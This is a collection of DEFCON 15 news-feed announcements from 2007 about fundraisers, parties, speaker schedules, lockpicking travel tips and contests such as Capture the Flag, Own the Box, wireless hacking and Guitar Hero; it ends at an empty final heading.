https://www.defcon.org/defconrss.xml This year the Dunk Tank raised $4,700 We matched that and added our contribution to reach a total of $12,000 to the EFF! We know they will put it to good use with their hard work! For the past 17 years, EFF has been proud to take on the hard cases to ensure that your liberty is not sacrificed unnecessarily. They are responsible for loads of support for Tor, stopping RIAA lawsuits, Privacy Issues, etc. You don't have to wait till the next Dunk tank@ DEFCON 16 to support them! Join EFF today! They work all year round so support them by donating to EFF at http://secure.eff.org/. Spread the word to your friends and family. Short goal list of current EFF Projects : Pull Congress Back Into the Wiretapping Fight! Repeal the REAL ID Act! Reform the PATRIOT Act! Support the FAIR USE Act! Fight the Justice Department's Copycrime Stop the SPY Act! Stop the Broadcasting Treaty Flip-Flop! CA Alert - Keep RFIDs out of State IDs! Don't Let Congress Shackle Digital Music! Tell Congress to Support E-Voting Reform! make sure every counts! Improve the Freedom of Information Act! Don't Let Cable Companies Ratchet Up Restrictions!.

==> theSummit at DEF CON 15

https://www.defcon.org/defconrss.xml Want to help support the EFF and Hacker Foundation? Would you like to meet with authors of those security books you have been reading all year long? Craving some live nerdcore? Kill three birds with one stone! Thursday August 2, 2007 @ 9:00PM Vegas 2.0 presents "theSummit" a fund raiser with a twist! Meet with computer security guru, listen to some great live music AND support two great causes at the same time! Meet up with us in the Riv Skyboxes this Thursday, tickets are $35 at the door. Need more details? Visit http://www.vegassummit.org

==> DEFCON 15 FINAL Schedule now on-line!

https://www.defcon.org/defconrss.xml We are proud to present the FINAL schedule of speakers and events for DEFCON 15! This year DEFCON has grown, and is offering the largest line of up speakers ever - thanks to all the new space available at our new venue, the Riviera Hotel. Because of this there are also more contests. There is an overwhelming amount of things to participate in. Pending Natural Disasters, Emergency, Missing, kidnapped or Canceled speakers this is our final schedule...well that's the intention anyway! If you are speaking or involved in the content side of things and you see a problem or something missing please let us know! See you at the show!

==> (beta) DEFCON 14 Black and White Video and Audio released!

https://www.defcon.org/defconrss.xml The video and audio from DEFCON 14 has been encoded and ready for download! There may be some minor tweaks, but all the video that is available has been encoded to iPod Video specs, H.264 and 320x240. Audio is in .mp3 192k format. We are trying to identify the artists in each hour, so if you know who they are please let us know and we'll update the file names so everyone gets proper credit. The following links will have to get you by until the complete RSS feed with iTunes and MRSS tags is complete: http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Carthsis-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Regenerator-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Jackalope-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Mind-Pop-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Minibosses-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-2-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-3-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-4-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-5-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-6-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-7-320-517kbps.mp4

==> Black and White Ball Lineup Announced!

https://www.defcon.org/defconrss.xml The Black and White ball is back in effect with the following bands and DJs ready to throw down. Friday Night Black Ball Industrial/ ebm / Noize Dress: your best blacks: Bondage Rubber and Fetish Encouraged Featuring : Regenerator http://www.regenerator.net/ DJs Patrice Wintamute SailorGloom Great Scott! Catharsis Kriz Klink And more ... Saturday Night: White ball ==Geekdom Release party== Dress: Your finest stormtrooper suit, togas, bedsheets and the likes. Featuring : Miss DJ Jackalope // Jungle Chaos http://www.dj-jackalope.com/ DualCore // Live Nerdcore Set http://dualcoremusic.com; *Minibosses // NES classics http://www.minibosses.com/ DJs Rustcycle / Electronic live mix http://www.rustcycle.com Crashish // DNB Casey // psytrance Mitch Mitchem // breakbeat/electroclash * scheduling tentative All acts subject to change. please see a complete listing posted throughout DEFCON venues

==> Amateur Radio at DEFCON 15

https://www.defcon.org/defconrss.xml For all you radio geeks! 146.58 (FM Simplex) will be the unofficial Defcon 15 frequency for Amateur Radio enthusiasts.

==> Sushicon 4.0

https://www.defcon.org/defconrss.xml Wednesday, August 1st at the Sushi Factory on Tropicana will be the location for ShshiCon 4.0 right before DEFCON. Love sushi? Want to meet new people and hang out in a sake fueled pre-con ritual? Then ShshiCon is for you! Organized byGonMinusOne, check out the forums for the latest details. https://forum.defcon.org/showthread.php?t=8578

==> World Premiere of Infest Wisely to be shown at DEFCON

https://www.defcon.org/defconrss.xml This year's DEFCON Movie Night will feature the new and highly buzz-worthy film "Infest Wisely." The film is centered around the increasingly less science-fictional world of commercial nanotechnology and it's been described this way: "Infest Wisely asks what would happen if Critical Mass teamed up with the geeks from DEFCON to stop commercialized nanotech from taking over our bodies and the world." It's a feature length movie in seven episodes, each with different directors but all written by novelist Jim Munroe, who will be our special guest for the screening. As always, there's no charge - come join us and support cinema licensed under the Creative Commons. For more information about the film, you can check out it's website. http://www.infestwisely.com/

==> DEFCON 15 Schedule now on-line!

https://www.defcon.org/defconrss.xml We are proud to present the schedule of speakers and events for DEFCON 15! DEFCON This year DEF CON has grown, and is offering the largest line of up speakers ever - thanks to all the new space available at our new venue, the Riviera Hotel. Because of this there are also more contests. There is an overwhelming amount of things to participate in. Please note that this is the first schedule version and is not final. As speakers and contests finalize their information the schedule will be updated up to the last minute. If you re speaking or involved in the content side of things and you see a problem or something missing please let us know!

==> New ToxicBBQ Contests!

https://www.defcon.org/defconrss.xml From Deviant: "There are two contests/events that I'll be running at this year's ToxicBBQ, both of which involve the "Exotic Meat" theme that I tend to focus upon year after year. I have a web page up online with full details, rules, info, etc... http://deviating.net/toxicbbq" -=[ Titanium Chef ]=- Cost to Participate: $40 per team Prizes for Winners: OiNK invite for each team member, secret grand prize, refund of entry fee, extreme bragging rights and Free giveaways of fun stuff to all participants DefCon Forums Sign-up Thread: https://forum.defcon.org/showthread.php?t=8367 Teams of up to three individuals will put their heads together and engage in heated battle to concoct a delicious dining experience focused around a secret theme ingredient. These hacker chefs will have both their culinary skills and their organizational abilities put to the test in this challenging event. All participants will gather together a few hours before the Toxic BBQ in order to witness the revealing of the event's secret ingredient, then they will disperse in order to gather supplies, reach Sunset Park, and prepare their food for the judges. Whose cuisine will reign supreme? Will opponents' grill-fu be stronger than you? Participate and find out! -=[ Guess The Flesh ]=- Cost to Participate: $10 per person Prizes for Winners: OiNK invite for first three people to correctly identify all meats. Free giveaways of fun stuff to all participants DefCon Forums Sign-up Thread : https://forum.defcon.org/showthread.php?t=8365 Have you ever thought to yourself, "Gee, i wish i could dine on the meat of nearly every kind of beast to walk the earth... but I don't own many high-powered firearms, i don't have the money to travel the world, and no government in their right mind would issue me a hunting license?" Well, now your dreams can become a reality. For less than the cost of what passes for a movie and popcorn nowadays, you can have a sample platter featuring eight meats that you aren't likely to see at the supermarket. However, instead of just cooking and randomly giving out samples willy-nilly, this year i have something new planned. I intend to prepare morsels of these meats and plate them in a way that they are not immediately identifiable or distinguishable from one another. Those who are eager to try some new flavors -- and those who think their pallets are up to the challenge -- can take a whack at identifying these various animals by taste and texture alone.

==> Be Prepared! Update

https://www.defcon.org/defconrss.xml The be prepared section of the DEFCON 15 site has been updated! Check it out.

==> Las Vegas concerts for Black Hat and DEFCON time frame

https://www.defcon.org/defconrss.xml From IrishMASMS on the DEFCON forums comes this helpful post: Las Vegas concerts for Black Hat & DEFCON time frame Some out of town folks hit me up asking about concerts around town during this year's Black Hat andDEFCON. I took a quick look on http://pollstar.com/ and http://www.jambase.com/ for what might be interesting. YMMV, though I thought sharing is caring. Fri 07/27/07 Violent Femmes Hard Rock Hotel and Casino Fri 07/27/07 Jonny Lang House Of Blues Sat 07/28/07 Tesla House Of Blues Sat 07/28/07 Rush MGM Grand Garden Arena Wed 08/01/07 John Lee Hooker Jr. Santa Fe Station Hotel & Casino Thu 08/02/07 John Lee Hooker Jr. Boulder Station Hotel & Casino Fri 08/03/07 Godsmack The Pearl Concert Theater At Palms Sat 08/04/07 Buckcherry, Hinder, Papa Roach The Pearl Concert Theater At Palms Sun 08/05/07 Against All Authority, Reel Big Fish / Less Than Jake, Streetlight Manifesto House Of Blues Mon 08/06/07 "Sounds Of The Underground": Amon Amarth, Chimaira, Every Time I Die, GWAR, Heavy Heavy Low Low, Job For A Cowboy, Necro, Shadows Fall , The Devil Wears Prada, The Number Twelve Looks Like You - House Of Blues Sat 08/11/07 The Fixx The Club @ Cannery Casino As for venues, the Hard rock sucks. House of Blues is one of the best in town. MGM Grand is ok, but the sound quality in the arena can be bleep in spots. The Pearl is the brand new venue in town, good luck getting tickets. The Station casinos are not bad venues, and I think those are free shows. The Cannery Casino I have never been to, so I can not say - and there is no review posted on www.yelp.com yet for me to reference. HTH!

==> Scavenger Hunt! Advice from the Winners!

https://www.defcon.org/defconrss.xml Scavenger Hunt! Advice from the Winners!! Free advice courtesy of hackajar with Vegas 2.0 Here's a quick list of things you will need to be fully geared up, if competing. I kinda wish we had something like this three years ago! 1.) Money - we spent ~$500 each year, though some good social engineering could very well fix this 2.) Digital Camera - Judges won't know what you did, without proof! 3.) Video Camera - Sometimes a photo DOESN'T say a thousand words, but motion video does! 4.) Transportation - Sometimes you have to go on recon, we always paid extra to have a car in front of valet for those quick runs 5.) Room at Hotel - Need somewhere to build a 30ft straw or host a geek girl strip off, your best bet is in a local room 6.) Printer - Don't ask me how many points we never got for lack of a stupid printer! 7.) Beer - It's easy to bribe goons and judges with this stuff, if you can find it. 8.) Start Early - Some items and tasks we could only do on Friday, remember things close on Saturday and Sunday, so be wise! 9.) Memorize the phrase "It's for the Scavenger Hunt" - nuff said I'm sure I'm missing something else in there, please add to my list! -Vegas 2.0 Defcon 14 Scav Hunt Winners

==> DEFCON 15 CFP is now closed!

https://www.defcon.org/defconrss.xml DEFCON 15 CFP is now closed! We are in the process of making our final selections and will start to fill in the online schedule soon! We will notify you of the status of your submission by July 1st. If you have not heard from us by then please email talks[at]defcon[dot]org. If you were not accepted don't be discouraged, we have recieved many many quality submissions this year but we can't accept them all. As you know we are in the process of expanding to accept more and more talks each year. There is still plenty you can do to get involved, join the forums, read up on our contests, even just take some cool pictures! pics.defcon.org is now live for use.The pics software is integrated with the defcon forums, so if you already have an account there you automatically have an account on https://pics.defcon.org/ Do your Photoshop skilz 0wnzor?! DEFCON Art Contest is currently open! Submit your art by June 25, to be used online and to be included in the DEFCON 15 program. We are looking for a Web Banner, Key Card, T-Shirt, Wallpaper! If you win you could win free admission and cash to be used at the DEFCON Swag booth! https://www.defcon.org/html/defcon-15/dc-15-forms/DC15-Artwork-Contest-Guidelines.pdf

==> New "Be Prepared"- Lock Picking for Sport and Amusement

https://www.defcon.org/defconrss.xml Lock Picking for Sport and Amusement DEFCON is a great place to learn all sorts of new skills - the skill of lockpicking is no exception. This year's Con will again have a "Lockpicking Village" - a fantastic event with all kinds of presentations, practice locks, sample tools and general education. We want everyone who's interested to check it out, but we want you to be careful and safe as well. Be sure to consult your state and local laws about possession of locksmith's tools. Staying in compliance with the applicable laws is, of course, your responsibility. When traveling, it's not a good idea to put tools of this nature in your carryon. While they're unlikely to cause any problems in checked baggage, those pointy little devils are very likely to be a problem in the security line. It probably ought to go without saying, but if you're making an international trip to DefCon, the scrutiny is much higher and you owe it to yourself to be thoroughly familiar with the rules and err on the side of caution. You don't need that kind of hassle. There's plenty of lockpicking knowledge and fun to be had even without your k-rad tools, so don't put yourself in a position to miss your flight. It's also an option to mail them to yourself in care of your hotel. Some hotels charge for this service, so be aware of the policies wherever you're staying. If the world of locksport is brand new to you and you're looking to get a little knowledge before the Con, you can check out Marc Weber Tobias' contributions to techblog Engadget (called The Lockdown.) More info is also available from Locksport International (lsi.com) or The Open Organization of Lockpickers ( toool.us or toool.nl for Dutch speakers) Link: https://www.defcon.org/html/defcon-15/dc-15-beprepared.html

==> Hackers on A Plane!

https://www.defcon.org/defconrss.xml Hey Hey! If you haven't seen it yet check out Hackers on a Plane! 2007 is a very special year for the global hacker community. Thanks to cooperation between the organizers of DefCon XV and the Chaos Communications Camp 2007, the two largest gatherings of hackers from around the world happen only a few days apart! This is where "Hackers on a Plane" comes in: The Hacker Foundation has put together a complete travel package to help bring together hackers from around the world for ten days of fun, culture and community. We see it as the first step to building a truly global hacker community. $1,337.00 (for those travelling roundtrip from the US & Canada) 1,337.00 (for those travelling roundtrip from Europe) Gets you: * Admission to DefCon in Las Vegas, NV, USA * Flight from Las Vegas to Frankfurt * Flight on the "Hackers on a Plane" charter flight from Frankfurt to Finow Airport * Admission to all days of CCCamp2007 * Accommodation at Camp Anaconda (no need to bring a tent!) * Return flight to select destinations in the USA (or flight to Las Vegas for DefCon for EU citizens.) More info at Hackers on a Plane! Link: http://hackersonaplane.info/info.html

==> LosT @ Con Mystery Box Challenge - Official Registration Open!

https://www.defcon.org/defconrss.xml mysterychallenge.org Official registration is open. To Register Teams must send an email to: Defcon15MysteryChallenge ]at[ mysterychallenge [dot] org -Teams are limited to 5 official members -You must receive a confirmation that your team is registered or you are NOT -You must submit a team name and list team members -Teams successful in completing the challenge last year are guaranteed a spot if registered by June 17. -New teams are encouraged to enter, however only those serious about completing the challenge -The challenge will take longer to complete this year Questions? Post here. Comments? Post here. New teams trying to decide if you have what it takes to compete? Post here (I encourage those who competed last year to answer these types of questions...) Link: https://forum.defcon.org/showthread.php?t=8509

==> NEW CONTEST! 0wn the box? Own the box!

https://www.defcon.org/defconrss.xml From ownthebox.cipherpunx.org/: Are you a defensive ninja? Are your services unbreakable, your builds airtight? Do your countermeasures have countermeasures for counter-countermeasures? So prove it, bucko... Bet your box on it, on the most hostile network in the world. Bring your laptop/server/desktop, hardened to the nines, running exactly two (2) visible services, to our specs, and we'll offer you up for the slaughter. The first person to compromise you walks away with your gear. When you're 0wned, you're owned. It's that simple. The last box(en) standing, unowned, wins, and the winner(s) can take his/her precious back home, safe in the knowledge that if it survived at DC, it can survive anywhere. For the other side of the fence, the reward is clear... Pick your target, 0wn the box, and own the box. A shopping spree for the elite. Link: https://forum.defcon.org/forumdisplay.php?f=337 Contest Site: http://ownthebox.cipherpunx.org/ Be sure to check the forums often it looks like they have already started to collect an interesting list of hardware up for the slaughter! Mwahahaha!

==> Announcing The DefCon 15 Wireless Contest

https://www.defcon.org/defconrss.xml Announcing The DefCon 15 Wireless Contest (queue Thus Spake Zathrustra) Are you a freq-geek? Think your WiFiFu is hot? Get high from sniffing packets on the ether? Think you're a great lover? We can't help you with the last one, but get ready because here's your chance to prove the rest of those outlandish claims to the world. Compete in the Wireless Contest, and we can validate you self esteem, at least in the geeky stuff. The Wireless Contest, following the format for the past few years, will be a series of "Mini-Contests". You can compete in only a single mini-contest or all of them. We recommend that teams be formed to fill in different skill areas. We are allowing a unlimited number of Teams -subject to resources- limited to 3 people each. First Place winners of individual mini-contests events get prizes and with a top prize will be awarded for the best overall of the contests. A common problem with the Wireless Contest in the last few years, is that some potential competitors felt that they didn't have the skills to even try. As a result, fewer competitors kept signing up. To elevate this, the Wireless contest this year is tied in heavily with the Wireless Village. If you want to compete in the contest, but feel you don't have a needed skill, you can come to the Wireless Village before a mini-contest and learn the needed skill at the one of the Wireless Village's world-famous Breakout Sessions. You walk in having no skills but a willingness to learn, learn a skill in an exciting breakout session taught by an expert, then go out and compete and the beat the pants at those loudmouth teams who said they'd pwn you. Learn + Touch = DO! link: https://forum.defcon.org/forumdisplay.php?f=309

==> CTF Qualifications Are Complete!

https://www.defcon.org/defconrss.xml From invisigoth: The qualification round for this years CTF is complete. More than 150 teams were actually submitting answers which means that participation for this year was more than double the previous high water mark (as far as we're aware). Results may be found at http://www.kenshoto.com/ as always. This years challenges came in a wide range of technologies and difficulties. No single team actually solved them all... Additionally, this years level of international participation was staggering... The MUD for this year will remain up for teams to ask questions and hopefully collaborate with each other about how they came to solutions for some of the harder challenges. Additionally, we will be putting most if not all of the challenges back online for a while so everybody can sharpen up... Stay tuned...

==> DEFCON 15 Network Team has two slots left!

https://www.defcon.org/defconrss.xml From the site defconnetworking.org: "DefCon presents a really unique opportunity. You know how hostile the environment is. Have you ever wondered what that traffic looks like? All you need do is ask. For years we've provided people the ability to plug in a capture/sniffer box and capture public con traffic to take back to your Evil Laboratory(tm) for analysis after con (you know, once you've sobered up & stuff). If you want in on the action, email us so we can RSVP a spot for you on our Table-of-Doom in the NOC." TWO SLOTS LEFT! To get an Idea check out last years network: Here are the PPT slides from DC14 Closing Ceremonies with all the net stats: DC14network.ppt http://www.defconnetworking.org/dc14network.ppt Remember, if you're planning anything "special", have specific needs for your talk, for your demo, for your break-out session, let us know EARLY so we can plan for it. About Defcon Networking: We're the group of volunteers who run the network at DEFCON. It's our job to design, plan, architect, implement, and secure the show network. We arrange bandwidth, we handle wireless, we provide secure connections for show staff, speakers, and press. Finally, we provide an environment where DefCon Attendees can share and be creative.

==> DEFCON 15 Speakers Selected!

https://www.defcon.org/defconrss.xml New speakers have been selected for DEFCON 15! Check out their abstracts and bios online now. The Schedule is not yet finished and we still have room for a few more talks! So don't get discouraged, submit your rootfu now! Speaker page: http://www.defcon.org/html/defcon-15/dc-15-speakers.html New Speakers selected: Squidly1, aka Theresa Verity, Thinking Outside the Console (box) Brendan O'Connor, Greater than 1:Defeating "strong" Authentication in Web Applications. Kenneth Geers, Greetz from Room 101 Peter Berghammer (pf0t0n), A Journalist's Perspective on Security Research. Schuyler Towne, Locksport: An Emerging Subculture Many more are online, check back often, the DEFCON 15 Schedule will be online shortly!

==> DEFCON 15 CFP Closing soon

https://www.defcon.org/defconrss.xml The DEFCON 15 CFP will be Closing June 15th! Please submit your rootfu to talks@defcon.org. We have been making selections and we are pleased to have accepted some really great speakers. There is still room to squeeze in a few more exceptional talks. Submit now, there will be no extensions possible! Submit: https://www.defcon.org/html/defcon-15/dc-15-cfp.html New for DEFCON 15: The second year being at the Riviera has allowed us to make some changes to the format from last year. We have more speaking rooms, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! If you have an IDEA please submit it, talks@defcon.org!

==> Amateur CTF Registration now OPEN!

https://www.defcon.org/defconrss.xml Registration for this years aCTF is officially open! Registration page: http://www.dc949.org/aCTFIII/register.php >From Contest Organizers: "We're recommending that you group yourselves in teams of three, as the prizes will come in triplicate. There will be prizes for win, place and show. We have some really good stuff in the works in terms of prizes, but I'm not going to mention them here since they're not bought and in our hands (and/or built)" For a little more information about the setup this year. http://www.dc949.org/aCTFIII/README.php

==> Announcing Official DC949 aCTF Artwork Contest!

https://www.defcon.org/defconrss.xml Official DC949 aCTF Artwork Contest The winners artwork will be made into an 8x4 foot vinyl sign. Besides bragging rights, the winner will also receive yet to be determined prize. Rules 1. The contest will remain open for a minimum of 1 week, and will remain open until a winner is chosen. 2. Submissions must be have a 2x1 or 1x2 ratio with a minimum resolution of 2000x1000 pixels. 3. Artwork must contain simplistic designs and colors. ie designs with definitive edges and no fading or merging colors. 4. Maximum number of colors that can be used is 4. 5. Artwork must contain "DC949" and "aCTF" in some legible form. Submissions must contain a .PNG, .JPG, or .GIF of the artwork as well as in a vector format. (.PSD, .EPS, etc) Please email submissions to cp-at-dc949-dot-org Forums discussion is here: https://forum.defcon.org/showthread.php?t=8456 Don't forget to use your talents to enter into the DEFCON 15 Artwok Contest too! DEFCON 15 Artwork Contest Guidelines http://www.defcon.org/html/defcon-15/dc-15-forms/DC15-Artwork-Contest-Gu idelines.pdf Submission deadline: All submissions must be received by June 25, 2007. Submit all entries to: sleestak\at\defcon dot org Categories: Web Banner Key Card T-shirt Wallpaper Banner Art Prize: - The first place winner will receive free admission to DEFCON 15 for one person (non-transferable to a future con),$50 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. T-Shirt Art Prize: Free admission to DEFCON 15 for two persons, $130 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. Wallpaper Art Prize: Free admission to the conference for one person, $50 credit that may be used at the official DEFCON SWAG Store

==> DEFCON 15 Network Team in Effect!

https://www.defcon.org/defconrss.xml As DC 15 gets closer all goon teams are powering up! Ever wonder what the network team is up to? Ever wanted to sniff the con traffic feed? Check out the defconnetworking.org! Lockheed throws down some defcon history and gets us ready for more! >From the site: DC15 Network 15MAY07 DefCon presents a really unique opportunity. You know how hostile the environment is. Have you ever wondered what that traffic looks like? All you need do is ask. For years we've provided people the ability to plug in a capture/sniffer box and capture public con traffic to take back to your Evil Laboratory(tm) for analysis after con (you know, once you've sobered up & stuff). If you want in on the action, email us so we can RSVP a spot for you on our Table-of-Doom in the NOC. 11MAY07 Why yes, we are in the midst of planning for DC15. Now that we've "done the dance" with the hotel (who are awesome folks, btw!) we know what we can and can't do and should have virtually no surprizes this year. We're planning higher bandwidth, better monitoring, and also some new interactive-type stuff (I hesitate speaking of it for fear of jinxing it!). We're actually spending our funds boosting up our own infrastructure (beyond the Arbua kit we have) so we have more ports, better fibre connectivity, better trunking. Remember, if you're planning anything "special", have specific needs for your talk, for your demo, for your break-out session, let us know EARLY so we can plan for it. --Lock

==> Announcing Amateur CtF 3 by DCG 949!

https://www.defcon.org/defconrss.xml From the official web site for the Amateur CtF: aCTF 3 "King of the Hill" Yes, it's official; we'll back again this year. The first year, nobody scored, the wifi network we set up had massive problems, but people seemed to have a little fun and see the potential. Last year, the network was stable, people scored, battled back and forth, and we were actually able to give out some prizes. There was some trouble with boxes staying up, but overall it was a huge success. Last year we saw some things that surprised us. There was a case of two teams which both could take a flag, but neither could lock the other out. They both then proceeded to write scripts to play the game for them. Yeah, it then made the server inaccessible due to the massive amounts of requests, but still... hats off to both of you. We didn't expect automated hacking. We also learned that while Windows NT might have worked in our little test environment, it really can't hold up to the brutality of a Defcon contest. I'm happy to say that Windows NT will not be appearing in this year's contest. We will be changing a few things around this year, but the basics will be the same as before. Find a flag, find a way to put your team name on it, and you'll score points for as long as you can keep your flag up there. As usual, details on the contest will be limited, however we will say that we're branching out a bit more this year. Hacking isn't just about buffer overflows and running metasploit, it's really about one upping someone (or everyone) else. It's about figuring out how things work and taking them apart and putting them back together to do something different, customizing things to make them do things they were never intended to do, and just generally learning how to beat the system.

==> Announcing DefConBots Contest!

https://www.defcon.org/defconrss.xml Kallahar has updated the software page for the DefConBots Contest. "Improvements over last year include faster response times and software alignment of the camera to where the gun is actually shooting. All the code is public domain, do whatever you want with it!" What is the point of the contest you ask? Quite simple it is to ceate a computer controlled gun that can shoot down targets in a shooting gallery. See http://defconbots.org/ for complete contest information.

==> NEW CONTEST! Guitar Hero II

https://www.defcon.org/defconrss.xml Guitar Hero II Contest!! A new contest at Defcon 15: Are you a Guitar Hero? Do your friends think you're l33t and can shred like a rock star? Then prove it! Contest Site: http://www.panadero.org/gh_home.html Forums discussion: https://forum.defcon.org/forumdisplay.php?f=335 Guitar Hero II - DEFCON STYLE!!!! Why Not!!! Rules (cause they tell us we have to have them...) * The contest will consist of 3 levels of play, Medium, Hard and Expert. * The contest will be played on Guitar Hero II, on the Xbox 360. * A initial pre qualification round will be held so that Experts aren't playing in the Medium level, etc...details of the prequals to come... * All contestants should be at their assigned time to play 10 minutes before their time. There will be some leeway if you are a few minutes late, but don't expect to get your turn if you show up hungover an hour after your time. * You may use your own guitar, as long as it has not been modified, and is for Xbox 360. * Free play is a chance for people that have never played Guitar Hero to have a chance. It's not a chance for contestants to practice. This contest is for everyone, and we want to make sure that is the case. Free play will be limited to one song per person, depending on how many are waiting to play. Scoring * The 'prequals' will be designed to ensure that Experts are not playing in the Medium category, just to win. We want the game to be fair, and everyone to have fun. We would hate for the lesser/newer players to be upset and frustrated because it's dominated by those that have years of practice. * The 'heats' are designed to weed out the newbs from the Guitar Heroes. Each player will play 2 songs, back to back, to come up with a cumulative high score. * The four highest scores will move to the finals for each level. * The finals will be tournament style, head to head, most points win and move to the final song. * The final two players for each level will play against each other to become the first annual Defcon Guitar Hero champion! * It is VERY important to pick the right songs to get into the finals. Some songs have more notes, for more Star Power and higher points, as some songs have less notes. * All songs in the finals will be chosen by the event coordinators and will not be announced until the start of the finals. Final songs will not be songs included in Xbox Live downloadable content, so that no player has an advantage over others, GOOD LUCK! Defcon STAR POWER!!! Do you want an extra 1000 points added on to your song??? Do ya? Bring me a COLD unopened beer! I won't accept it if it's opened (no date rape drugs for the contest organizers!) Any beer, except for Guinness, you get an extra 1000 points of Star Power! Keep in mind that 6-packs are appreciated, but it will still only get you 1000 points! I love beer, but it's not fair to bring a case of beer and get an extra 12000 points!

==> Toxic BBQ contests and events!!

https://www.defcon.org/defconrss.xml Once again, the Toxic BBQ is looking for a slogan. Something catchy, something creative. It will be used on the front of the Toxic BBQ T-Shirts. Last year was ASTCells slogan "If its dead we cook it" "If its alive we cook it" " ... a little longer." Submit your ideas. https://forum.defcon.org/showthread.php?p=86581#post86581 Come on, It's not that hard. Toxic BBQ IV Events and Contests: Iron Chef I Time: To Be Announced Contact: Deviant Ollam Event Desc: Contestants in teams of 3 or less will race to cook and present a dish made from an ingredient revealed to them at the start of the contest. After a timed preperation period, the dishes will be awarded points by a panel of judges who will judge for Presentation, Uniqueness, and Flavor! For more info on the Toxic BBQ go here: http://www.toxicbbq.com/ Forums discussion: https://forum.defcon.org/forumdisplay.php?f=308

==> Announcing CoffeeWars VIII: Pre-Con Ranting

https://www.defcon.org/defconrss.xml The Coffee Wars Crew is getting ready for their Call for Beans! >From the website: Wake up and smell the coffee war, people: DefCon 15 is just around the corner, and that means another edition of the world's best-known hacker coffee competition. Already, the frenzy has begun! Now's the time when you have an All-Inclusive Divine Excuse to unashamedly mingle with your own kind without having to shroud your activities under the shadow of the Evil Corporate Coffee Empire! Yes, now we caffeine fiends can gather without shame! WHAT? You want a shot of espresso?! We got your shot right here, pal. This event ain't no freebie. If you want a cup, you gotta pony up. Coffee, that is. Whole bean. We're judging it all. The best, the strongest, the most caffeinated. You name it. ...but regular store-bought or corporate coffee trash will only earn a trashing. You think you got what it takes? Then we'll take what you got! Bring your best beans and put 'em up for judgment by our over-qualified, over-caffeinated, (and over-rated) Coffee Wars judges and contestant panel! We keep hearing that someone else's beans are the best. Now it's time to prove it bean-to-bean! Forums discussion is here: https://forum.defcon.org/forumdisplay.php?f=284

==> Announcing LosT @ Con Mystery Box Challenge!

https://www.defcon.org/defconrss.xml The idea is simple.. form a team, get a box, open box. But is it that simple? The box is a mystery, with many puzzles involved in opening it. To get things going for this year Lost Boy has started to accept team sign ups, as well as release clues to hint at some of the puzzles involved. Here is a picture on how NOT to open a mystery box: https://pics.defcon.org/showphoto.php?photo=153 For a bit on the last challenge check CNet's coverage here: http://news.com.com/2300-1029_3-6102806-5.html Interested? Check out the thread on the challenge over on the forums.

==> Capture the Flag Contest Announced!

https://www.defcon.org/defconrss.xml Capture the Flag at DEFCON continues it's long tradition with the announcement by Kenshoto of the CtF qualification round! >From their announcement: Kenshoto's army of code-gnomes has been working feverishly on the production of this years installment of WarGamez (CTF), more to come here yet tonight, but we'll be making the quals announcement *very* soon. Check it: Dr. Kenneth Shoto proudly announces that the qualifying round for the Defcon Capture the Flag contest is now pen for registration. The qualifying contest will start at 1 June 2007 @ 2200 EST and end 3 June 2007 @ 2200 EST. Teams can be any size you'd like (more ninjas clearly == better) and each team will need to register before 1 June 2007 @ 2200 EST in order to get an account for the actual game. The top 7 teams qualify for a seat at the table at the proverbial 'big show' (the actual CtF competition) to be held at Defcon 15. Defcon takes place August 3-5th 2007 (https://www.defcon.org/) so make sure you clear all those WoW, D&D, and Eve-Online play dates off your calendar early. That's right hackers and hackettes, get your debuggers warmed up and your shellcode tested, cuz it's that time of year again. What you say? You don't know what the bleep we're talking about? Well, peep dis: The core of the qualifying competition will be a quiz-like interface where each team may select a question and then must hack until they can answer it. Topics will vary widely, but of course include such fan-favorites as reversing martian binaries, landing shellcode and a double lutz simultaneously, and stealing information from strange places. We've also thrown in challenges like intar-webs hax0rification and mind-bendy trivia so the 5kr1p+ K1dd1e5 can play along (much love). This year the game allows for maximum parallelization on questions. When the leading team selects a question, that question (and all the ones they already answered) becomes available to the trailing teams. In other words, there is no need to register multiple ghost accounts as they won't give any advantage (*ahem*skewl*cough)... Don't have the stones to think you can win? Well, you should sign-up and play anyway. The winning team from last year actually got primed up for the game by competing in quals. They then kicked it up a notch by spending the next three months figuring out every detail of every challenge we put out there and explaining it all as if paid to do so (check it out http://nopsr.us/ctf2006prequal/). Besides, how else are you gonna sharpen those skillz and convert yourself from poser to p3wner? So what are you waiting for? Jump onto your nops-sled and slide over to http://kenshoto.allyourboxarebelongto.us:1337/ to sign up for quals now... -kenshoto (ctf07 at kenshoto.com)

==> Announcing the Art Work Contest!

